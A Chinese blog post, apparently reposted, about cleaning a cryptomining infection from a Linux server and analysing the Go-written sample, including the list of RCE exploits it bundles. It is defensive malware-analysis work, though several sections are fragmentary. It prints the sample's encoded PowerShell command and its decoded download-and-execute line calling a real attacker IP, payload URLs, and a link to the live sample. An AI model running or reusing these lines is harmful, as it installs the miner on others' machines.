1. 软市首页
  2. 行业观察

linux挖矿的清理工具,Linux挖矿病毒的清除与分析

行业观察

文章目录

起因

清除过程

确定病因

开始清除

复发

定时任务

update.sh分析

修复

样本分析:networkservice文件的分析

分析准备

功能分析

sysguard

样本下载

起因

舍友在宿舍喊着,这服务器好卡啊,难受啊!我调侃他是不是被挖矿了,top命令看一下CPU占用。

一看吓一跳,一个叫做sysupdate的进程占据了绝大部分的CPU资源。CPU使用率接近100%。

看来被挖矿是坐实了。

清除过程

确定病因

这个病毒还不是算很变态,很多挖矿病毒,使用top命令都看不到挖矿程序的进程。

基本可以确定这个占据绝大部分cpu资源的进程sysupdate,就是挖矿程序了,我们需要先找到他。

使用命令:

ps -aux | grep sysupdate

查看病毒的PID 。

为了获取绝对路径,使用:

ls -l /proc/{pid }/exe

发现sysupdate的绝对路径在/etc/sysupdate。

下载下来,上传到VirusTotal。

好,我知道大家都不关心这个。

定时任务

我是先去看了下日志..发现什么都没有Orz,应该是被清了。

那还是先来检查下定时任务吧:

crontab -l或者cat /var/spool/cron/root

还可以去查看定时任务的日志。

more /var/log/cron log

太多的话,可以在后面加上| grep -v {要排除的关键字}来排除无用信息。

干掉别的挖矿病毒(见kill_miner_proc函数)。

看到.gopclntab,基本就可以确定是golang编写的。我们这里使用IDAGolangHelper来帮助恢复符 信息。

从Github下载下来后,将脚本拷贝到IDA目录的python文件夹下,重启IDA,菜单选择File-Script Command..导入go_entry.py并运行。

功能分析

我们接下来就可以从main_main函数开始看,整个程序的大概流程。

1.首先会去hxxps://pixeldra.in/api/download/I9RRye下载ips_cn.txt并保存为dkelc。

程序内包含了大量的exploit。基本都是RCE即远程命令执行,下表做了部分列举:

Redis未授权RCE

Hadoop未授权RCE

Drupal CVE-2018-7600

ElasticSearch CVE-2015-1427

ElasticSearch CVE-2014-3120

Redis爆破模块

Spring CVE-2018-1273

Sqlserver Exploit模块

ThinkPHP5 RCE

Weblogic CVE-2017-10271

config set dir “/var/spool/cron”

sysguard

在分析过程中,发现不仅仅有Linux版,还有Windows版。

对于windows,会去执行下面的命令:

powershell-windowstylehidden-nop-encaQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADQAMwAuADIANAA1AC4AMgAyADIALgA1ADcAOgA4ADYANgA3AC8ANgBIAHEASgBCADAAUwBQAFEAcQBiAEYAYgBIAEoARAAvAHUAcABkAGEAdABlAC4AcABzADEAJwApAA==

base64解密为:

iex(New-Object Net.WebClient).DownloadString(‘http://43.245.222.57:8667/6HqJB0SPQqbFbHJD/update.ps1’)

即下载执行update.ps1,没什么新意,火绒就可以查杀拦截:

42296b8330e096901449ac322e2c8d43.png

windows版的下载地址如下,因为是Go语言编写的,其实内容都是大同小异的:

hxxp://43.245.222.57:8667/6HqJB0SPQqbFbHJD/sysupdate.exe

hxxp://43.245.222.57:8667/6HqJB0SPQqbFbHJD/sysguard.exe

hxxp://43.245.222.57:8667/6HqJB0SPQqbFbHJD/networkservice.exe

hxxp://43.245.222.57:8667/6HqJB0SPQqbFbHJD/update.ps1

样本下载

https://github.com/xuing/hello-world/blob/master/%E6%8C%96%E7%9F%BFlinux_sysupdate.zip

文章知识点与官方知识档案匹配,可进一步学习相关知识CS入门技能树Linux入门初识Linux24759 人正在系统学习中 相关资源:地摊叫卖广告软件 商场促销 文字转换声音 卖场叫卖语音广告制作

声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!

上一篇 2021年4月5日
下一篇 2021年4月5日

相关推荐

首页
软件超市
企服市场
会员中心